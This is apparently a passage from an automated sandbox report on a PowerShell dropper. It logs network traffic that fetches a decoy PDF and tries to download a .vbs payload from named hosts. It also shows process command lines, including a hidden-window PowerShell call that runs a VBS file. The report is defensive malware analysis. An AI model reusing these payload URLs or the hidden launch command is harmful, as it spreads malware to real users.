                                                                                              Dec 19, 2024 12:50:41.236665010 CET192.168.2.81.1.1.10x27e8Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:44.995392084 CET192.168.2.81.1.1.10xe8c5Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:55.645312071 CET192.168.2.81.1.1.10x5c20Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:12.447738886 CET192.168.2.81.1.1.10xc8d3Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:24.891891956 CET192.168.2.81.1.1.10x54cStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 12:50:41.374449015 CET1.1.1.1192.168.2.80x27e8No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:41.374449015 CET1.1.1.1192.168.2.80x27e8No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:44.436049938 CET1.1.1.1192.168.2.80x98c2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:44.436049938 CET1.1.1.1192.168.2.80x98c2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:44.436049938 CET1.1.1.1192.168.2.80x98c2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:44.436049938 CET1.1.1.1192.168.2.80x98c2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:45.220695972 CET1.1.1.1192.168.2.80xe8c5No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:50:55.893668890 CET1.1.1.1192.168.2.80x5c20No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:12.591471910 CET1.1.1.1192.168.2.80xc8d3No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:25.029556990 CET1.1.1.1192.168.2.80x54cNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:50.468987942 CET1.1.1.1192.168.2.80x625aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:50.468987942 CET1.1.1.1192.168.2.80x625aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.astenterprises.com.pk
                                                                                              • www.bluemaxxlaser.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.849707203.175.174.69803284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 19, 2024 12:50:45.342175961 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                              Host: www.bluemaxxlaser.com
                                                                                              Connection: Keep-Alive
                                                                                              Dec 19, 2024 12:50:46.874804020 CET516INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 11:50:46 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 315
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.849704107.161.23.1504433284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 11:50:42 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                              Host: www.astenterprises.com.pk
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-19 11:50:43 UTC217INHTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              content-type: application/pdf
                                                                                              last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                              accept-ranges: bytes
                                                                                              content-length: 871324
                                                                                              date: Thu, 19 Dec 2024 11:50:42 GMT
                                                                                              server: LiteSpeed
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                              Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                              Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                              Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                              Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                              Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                              Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                              Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                              Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                              Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                              2024-12-19 11:50:43 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                              Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:06:50:27
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1"
                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:06:50:27
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff6ee680000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:06:50:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:06:50:43
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                              Imagebase:0x7ff6e8200000
                                                                                              File size:5'641'176 bytes
                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:06:50:45
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                              Imagebase:0x7ff79c940000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:06:50:45
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff67e6d0000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:06:50:45
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                              Imagebase:0x7ff79c940000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Function 00007FFB4B074F1A Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1790110342.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffb4b070000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: B_H
                                                                                                • API String ID: 0-493211873
                                                                                                • Opcode ID: f968c9869cf94cfe36e8d624ecfe587347066d1f53da774928d49e20c17e015d
                                                                                                • Instruction ID: f5245c76a8e81f8479e31e818f96e2545b52720fa858d1878d6cd234a2712a1b
                                                                                                • Opcode Fuzzy Hash: f968c9869cf94cfe36e8d624ecfe587347066d1f53da774928d49e20c17e015d
                                                                                                • Instruction Fuzzy Hash: C3D146A291EA894FE795AF78C8555B9BFD0EF16311B0840FED58CC72E3D918E805C391
                                                                                                Function 00007FFB4B075116 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1790110342.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffb4b070000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: B_H
                                                                                                • API String ID: 0-493211873
                                                                                                • Opcode ID: 46bbbf23d093bef60eababd0b25d1bbfb5d2300afa3e29a3277b29664f30eed1
                                                                                                • Instruction ID: 8eb3dc313406b69db30cc8fdfff3b1d0cc9e468e59c3a3a66c2686fd6ff108df
                                                                                                • Opcode Fuzzy Hash: 46bbbf23d093bef60eababd0b25d1bbfb5d2300afa3e29a3277b29664f30eed1
                                                                                                • Instruction Fuzzy Hash: AE1101B1A1E6894FE755EFA8C1A02B8B791EF48302F1440BEC58DC72A3D9299805C351
                                                                                                Function 00007FFB4B072026 Relevance: .4, Instructions: 425COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
